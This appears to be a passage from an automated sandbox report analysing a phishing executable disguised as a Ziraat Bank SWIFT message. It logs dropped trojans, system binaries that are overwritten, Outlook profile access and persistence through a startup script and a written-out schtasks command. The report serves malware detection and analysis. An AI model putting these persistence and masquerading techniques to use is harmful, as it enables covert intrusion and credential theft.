                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: appresolver.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: bcp47langs.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: slc.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sppc.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeStatic file information: File size 2267136 > 1048576
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x160800
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: svchost.exe, 00000005.00000003.1284856650.00000000080A0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: ALG.pdbGCTL source: svchost.exe, 00000005.00000003.1293877990.0000000008A00000.00000004.00001000.00020000.00000000.sdmp, alg.exe.5.dr
                          Source: Binary string: _.pdb source: svchost.exe, 00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: wntdll.pdbUGP source: spadixes.exe, 00000002.00000003.1280825411.0000000004100000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000002.00000003.1280700151.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001A.00000003.1418690449.0000000004210000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001A.00000003.1423932497.0000000004070000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001D.00000003.1437240120.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001D.00000003.1437571692.0000000003970000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001F.00000003.1448879343.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001F.00000003.1448493328.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000021.00000003.1461716195.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000021.00000003.1462628419.0000000003840000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: wntdll.pdb source: spadixes.exe, 00000002.00000003.1280825411.0000000004100000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000002.00000003.1280700151.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001A.00000003.1418690449.0000000004210000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001A.00000003.1423932497.0000000004070000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001D.00000003.1437240120.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001D.00000003.1437571692.0000000003970000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001F.00000003.1448879343.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001F.00000003.1448493328.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000021.00000003.1461716195.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000021.00000003.1462628419.0000000003840000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: ALG.pdb source: svchost.exe, 00000005.00000003.1293877990.0000000008A00000.00000004.00001000.00020000.00000000.sdmp, alg.exe.5.dr
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                          Data Obfuscation

                          barindex
                          Source: 5.2.svchost.exe.5800f16.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                          Source: 5.2.svchost.exe.6fa8b90.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                          Source: TrojanAI.exe.5.drStatic PE information: 0xAA16B5AE [Fri Jun 4 22:50:22 2060 UTC]
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_0009E01E LoadLibraryA,GetProcAddress,0_2_0009E01E
                          Source: neworigin.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x480db
                          Source: TrojanAI.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x42478
                          Source: alg.exe.5.drStatic PE information: real checksum: 0x2096e should be: 0x12e708
                          Source: server02.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x2673b
                          Source: armsvc.exe.5.drStatic PE information: section name: .didat
                          Source: alg.exe.5.drStatic PE information: section name: .didat
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_0009288B push 66000923h; retn 000Fh0_2_000928E1
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000A6B05 push ecx; ret 0_2_000A6B18
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_00089C63 push edi; retn 0000h0_2_00089C65
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000A8D36 push esi; ret 0_2_000A8D38
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_00089DD8 push F7FFFFFFh; retn 0000h0_2_00089DDD
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_00E43240 push ss; retf 0_2_00E43244
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_00E43248 push ss; retf 0_2_00E43244
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008E6B05 push ecx; ret 2_2_008E6B18
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008C9C63 push edi; retn 0000h2_2_008C9C65
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008C9DD8 push F7FFFFFFh; retn 0000h2_2_008C9DDD
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008E8D36 push esi; ret 2_2_008E8D38
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0041C40C push cs; iretd 5_2_0041C4E2
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00423149 push eax; ret 5_2_00423179
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0041C50E push cs; iretd 5_2_0041C4E2
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004231C8 push eax; ret 5_2_00423179
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040E21D push ecx; ret 5_2_0040E230
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0041C6BE push ebx; ret 5_2_0041C6BF
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04BA7DF0 push 04BA7D4Bh; ret 5_2_04BA7D80
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04BA7DF0 push 04BA7DD7h; ret 5_2_04BA7D9F
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04BA7DF0 push 04BA7D5Fh; ret 5_2_04BA7DB3
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04BA7DF0 push 04BA81E6h; ret 5_2_04BA7E2D
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04BA7DF0 push 04BA7FCCh; ret 5_2_04BA82BB
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04BA7DF0 push 04BA8468h; ret 5_2_04BA852D
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04BA8550 push 04BA852Eh; ret 5_2_04BA7F3A
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04BA8550 push 04BA8514h; ret 5_2_04BA7F66
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04BA8550 push 04BA7E66h; ret 5_2_04BA8057
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04BA8550 push 04BA817Ah; ret 5_2_04BA808B
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04BA8550 push 04BA82E5h; ret 5_2_04BA80D9
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04BA8550 push 04BA826Ah; ret 5_2_04BA819E
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04BA8550 push 04BA849Ch; ret 5_2_04BA81E4
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04BA8550 push 04BA8321h; ret 5_2_04BA82E0
                          Source: spadixes.exe.0.drStatic PE information: section name: .reloc entropy: 7.871402794637499
                          Source: 5.2.svchost.exe.5800f16.1.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'YFZ8A95ybiywH', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                          Source: 5.2.svchost.exe.6fa8b90.3.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'YFZ8A95ybiywH', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

                          Persistence and Installation Behavior

                          barindex
                          Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\server02.exeJump to dropped file
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeFile created: C:\Users\user\AppData\Local\bothsided\spadixes.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\TrojanAI.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\neworigin.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeFile created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\alg.exeJump to dropped file

                          Boot Survival

                          barindex
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbsJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:31 /du 23:59 /sc daily /ri 1 /f
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbsJump to behavior
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnkJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04BACBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,5_2_04BACBD0

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_0009EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0009EB42
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008DEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_008DEB42
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000A123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_000A123A
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
